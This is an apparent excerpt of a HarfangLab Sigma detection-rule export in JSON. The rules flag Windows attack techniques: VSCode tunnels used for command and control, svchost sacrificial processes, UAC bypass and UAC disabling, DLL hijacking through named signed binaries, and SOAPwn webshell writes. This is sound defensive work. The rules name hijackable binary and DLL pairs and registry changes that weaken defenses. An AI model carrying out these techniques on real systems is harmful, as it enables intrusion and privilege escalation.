"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/",
"https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_vs_code_tunnel_commandline.yml",
"content": "title: VSCode Proxy Tunnel Started via Command-line (Windows)\nid: 17d344bd-5969-438e-b896-775f30a96618\ndescription: |\n This rule detects the VSCode binary being used with a command-line indicating a network tunnel.\n Since July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\n This allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\n It is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\nreferences:\n - https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/09/25\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_cmd:\n CommandLine|contains: ' tunnel'\n\n selection_image:\n Image|endswith:\n - '\\code.exe'\n - '\\codium.exe'\n Signed: 'true'\n\n selection_peinfo:\n OriginalFileName: 'electron.exe'\n Description: 'Visual Studio Code'\n\n condition: selection_cmd and (selection_image or selection_peinfo)\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "17d344bd-5969-438e-b896-775f30a96618",
"rule_name": "VSCode Proxy Tunnel Started via Command-line (Windows)",
"rule_description": "This rule detects the VSCode binary being used with a command-line indicating a network tunnel.\nSince July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\nThis allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\nIt is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\n",
"rule_creation_date": "2023-09-25",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "18048693-66e0-4701-b874-e81772fd4433",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627316Z",
"creation_date": "2026-03-23T11:45:34.627318Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627323Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cybersync.org/blogs-en/hunting_cobalt_strike_in_memory",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_svchost.yml",
"content": "title: Svchost.exe Sacrificial Process Spawned\nid: 18048693-66e0-4701-b874-e81772fd4433\ndescription: |\n Detects the suspicious execution of the legitimate svchost.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used, for example, by Cobalt Strike.\n It is recommended to investigate the parent process performing this action and the destination IP address of the svchost.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://cybersync.org/blogs-en/hunting_cobalt_strike_in_memory\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/29\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\system32\\svchost.exe'\n\n # This is handled by the rule 2fe027bc-7a3c-412a-9493-8581215d5157\n filter_computrace:\n ParentImage:\n - '?:\\Windows\\System32\\rpcnetp.exe'\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "18048693-66e0-4701-b874-e81772fd4433",
"rule_name": "Svchost.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate svchost.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used, for example, by Cobalt Strike.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the svchost.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-29",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1827b106-4555-4cda-9f03-7095766f3505",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074260Z",
"creation_date": "2026-03-23T11:45:34.074262Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074267Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.greyhathacker.net/?p=796",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_cliconfg.yml",
"content": "title: UAC Bypass Executed via cliconfg\nid: 1827b106-4555-4cda-9f03-7095766f3505\ndescription: |\n Detects a process being spawned by cliconfg.exe.\n Cliconfg.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://www.greyhathacker.net/?p=796\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/11/17\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\cliconfg.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1827b106-4555-4cda-9f03-7095766f3505",
"rule_name": "UAC Bypass Executed via cliconfg",
"rule_description": "Detects a process being spawned by cliconfg.exe.\nCliconfg.exe does not normally spawn any process, this action is probably the result of an UAC bypass attempt.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2020-11-17",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "18606208-5435-42c6-b17a-7b5ceacc248e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618797Z",
"creation_date": "2026-03-23T11:45:34.618799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618804Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html",
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fontsets.yml",
"content": "title: DLL Hijacking via FontSets.exe\nid: 18606208-5435-42c6-b17a-7b5ceacc248e\ndescription: |\n Detects potential Windows DLL Hijacking via FontSets.exe related to Neuber Software Typograf font manager.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ttfman.exe'\n ImageLoaded|endswith: '\\FaultRep.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\typograf\\'\n - '?:\\Program Files (x86)\\typograf\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\typograf\\'\n - '?:\\Program Files (x86)\\typograf\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'A. & M. Neuber Software'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "18606208-5435-42c6-b17a-7b5ceacc248e",
"rule_name": "DLL Hijacking via FontSets.exe",
"rule_description": "Detects potential Windows DLL Hijacking via FontSets.exe related to Neuber Software Typograf font manager.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1878e97a-df8d-4dd8-82f0-e84edc867171",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623606Z",
"creation_date": "2026-03-23T11:45:34.623608Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623612Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/?1",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_soapwn.yml",
"content": "title: IIS SOAPwn Vulnerability Exploited\nid: 1878e97a-df8d-4dd8-82f0-e84edc867171\ndescription: |\n Detects a suspicious file creation or modification potentially caused by .NET Framework SOAP/WSDL proxy abuse (SOAPwn).\n Vulnerable applications may be coerced into writing arbitrary files via attacker-controlled WSDL or proxy URLs using non-HTTP schemes.\n It is recommended to analyze the content of the XML file for any suspicious content related to a webshell.\nreferences:\n - https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/?1\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/12\nmodified: 2026/01/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.persistence\n - attack.t1505.003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'write'\n ProcessImage|endswith:\n - '\\w3wp.exe'\n - '\\iisexpress.exe'\n - '\\dotnet.exe'\n FirstBytes|startswith: '3c3f786d6c20'\n Path|endswith:\n - '.cshtml'\n - '.aspx'\n - '.asp'\n - '.ashx'\n - '.asmx'\n - '.ascx'\n - '.asax'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1878e97a-df8d-4dd8-82f0-e84edc867171",
"rule_name": "IIS SOAPwn Vulnerability Exploited",
"rule_description": "Detects a suspicious file creation or modification potentially caused by .NET Framework SOAP/WSDL proxy abuse (SOAPwn).\nVulnerable applications may be coerced into writing arbitrary files via attacker-controlled WSDL or proxy URLs using non-HTTP schemes.\nIt is recommended to analyze the content of the XML file for any suspicious content related to a webshell.\n",
"rule_creation_date": "2025-12-12",
"rule_modified_date": "2026-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "189eeb83-5aec-4186-97ea-ad22929a4f15",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610304Z",
"creation_date": "2026-03-23T11:45:34.610308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610315Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration",
"https://medium.com/@boutnaru/the-windows-process-journey-useraccountcontrolsettings-exe-3d8b88cc944d",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1548_uac_consent_config_disabled_manually.yml",
"content": "title: UAC Registry Configuration Disabled Manually\nid: 189eeb83-5aec-4186-97ea-ad22929a4f15\ndescription: |\n Detects a change in the User Account Control registry configuration.\n This rule detects the complete disabling of the UAC consent window performed manually via the legitimate UserAccountControlSettings.exe binary.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate actions taken during this user session, to look for subsequent suspicious actions performed on the host and to determine whether the user performing these actions has been compromised.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://medium.com/@boutnaru/the-windows-process-journey-useraccountcontrolsettings-exe-3d8b88cc944d\n - https://attack.mitre.org/techniques/T1548/\ndate: 2024/10/23\nmodified: 2025/10/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n Details: 'DWORD (0x00000000)'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n - '?:\\Windows\\SysWOW64\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n\n condition: selection\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "189eeb83-5aec-4186-97ea-ad22929a4f15",
"rule_name": "UAC Registry Configuration Disabled Manually",
"rule_description": "Detects a change in the User Account Control registry configuration.\nThis rule detects the complete disabling of the UAC consent window performed manually via the legitimate UserAccountControlSettings.exe binary.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate actions taken during this user session, to look for subsequent suspicious actions performed on the host and to determine whether the user performing these actions has been compromised.\n",
"rule_creation_date": "2024-10-23",
"rule_modified_date": "2025-10-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "18ae8604-550e-4ae2-a46b-dd87ad258288",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602362Z",
"creation_date": "2026-03-23T11:45:34.602366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602373Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ehstorauthn.yml",
"content": "title: DLL Hijacking via ehstorauthn.exe\nid: 18ae8604-550e-4ae2-a46b-dd87ad258288\ndescription: |\n Detects potential Windows DLL Hijacking via ehstorauthn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ehstorauthn.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "18ae8604-550e-4ae2-a46b-dd87ad258288",
"rule_name": "DLL Hijacking via ehstorauthn.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ehstorauthn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "18fb7194-8782-460e-b4ef-73265aabdd6b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591625Z",
"creation_date": "2026-03-23T11:45:34.591628Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591636Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmttpmvscmgrsvr.yml",
"content": "title: DLL Hijacking via rmttpmvscmgrsvr.exe\nid: 18fb7194-8782-460e-b4ef-73265aabdd6b\ndescription: |\n Detects potential Windows DLL Hijacking via rmttpmvscmgrsvr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmttpmvscmgrsvr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\profapi.dll'\n - '\\winscard.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "18fb7194-8782-460e-b4ef-73265aabdd6b",
"rule_name": "DLL Hijacking via rmttpmvscmgrsvr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmttpmvscmgrsvr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "191f1aa8-40cc-4b37-b39c-8821d11b97d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623027Z",
"creation_date": "2026-03-23T11:45:34.623029Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623033Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#disable-script-logging",
